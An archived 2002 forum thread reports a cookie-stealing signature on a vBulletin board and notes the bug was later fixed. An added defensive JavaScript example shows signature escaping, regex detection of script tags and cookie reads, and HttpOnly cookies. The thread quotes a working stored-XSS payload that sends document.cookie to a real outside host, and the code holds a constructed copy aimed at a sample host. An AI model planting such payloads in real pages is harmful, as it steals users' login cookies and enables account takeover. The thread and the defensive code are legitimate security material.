vb.org Archive


rijko412 05-24-2002 08:10 PM

vbulletin easy to hack?
 
Quote:

I've identified the culprit, and sorry mate I'm not doing you any more favours. My personal opinion is that xxxxx was the one responsible (aka xxxxx if you don't know which one I'm on about). The reason being this little bumnugget in his sig:

<script>document.write('<img src="http://www.inforaa.net/cgi/news.pl&a='+document.cookie+'">')</script>

Basically this is a password stealer. It generates an image tag, with your user id and cookie-encrypted password tacked on the end of the URL. It points to his server. If you've ever viewed his sig, he's got your password. (or an encrypted form, but that can still be used to gain access to any vBulletin account you might have, possibly other forum systems if they also use MD5 password cookies) xxxx admits this but claims that he was the only one who saw the passwords and did not use them to attack xxxx. My experience suggests otherwise (and I shall go into more detail later) but even if these passwords weren't used in the attack, he was still stealing passwords (which he seems to think is okay), so he's now banned.

This is what happened at my friend's forum. I think this is something that had to be said.

Steve Machol 05-25-2002 03:42 AM

This bug was fixed several versions ago. You should tell your friend to read the announcements regarding vB and upgrade whenever there's a security fix.
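
The signature quoted in the first post only works when a forum emits user-supplied markup as live HTML and the login cookie is readable from script. The following is an added example, not part of the thread and not vBulletin's fix (which the thread does not describe): it shows output encoding for signatures, an audit check for stored signatures, and an HttpOnly session cookie. All function names and the sample host `collector.example` are constructed for illustration.

```javascript
// Added example, not vBulletin code. All names here are hypothetical.

// Constructed sample modelled on the signature quoted in the thread.
const SAMPLE_SIG =
  "<script>document.write('<img src=\"http://collector.example/c?a='" +
  "+document.cookie+'\">')</script>";

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode every HTML metacharacter so user text cannot open a tag or attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render a signature as inert text inside a wrapper the forum controls.
function renderSignature(sig) {
  return '<div class="signature">' + escapeHtml(sig) + '</div>';
}

// Markers of active content that should never appear in a stored signature.
const ACTIVE_CONTENT = {
  'script-tag': /<\s*script\b/i,
  'event-handler': /\bon[a-z]+\s*=/i,
  'javascript-url': /javascript\s*:/i,
  'cookie-read': /document\s*\.\s*cookie/i,
};

// Audit helper for existing rows: returns the names of the markers found.
function auditSignature(sig) {
  return Object.keys(ACTIVE_CONTENT).filter((k) => ACTIVE_CONTENT[k].test(sig));
}

// Defence in depth: the session identifier (a random token, not a password
// hash) goes out HttpOnly, so document.cookie never exposes it to page script.
function sessionCookieHeader(name, token) {
  return name + '=' + encodeURIComponent(token) +
    '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

console.log(renderSignature(SAMPLE_SIG));
console.log(auditSignature(SAMPLE_SIG)); // [ 'script-tag', 'cookie-read' ]
console.log(sessionCookieHeader('sid', 'constructed-random-token'));
```

Encoding on output is the primary control; the audit function is for finding signatures that were stored before the encoding was in place.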

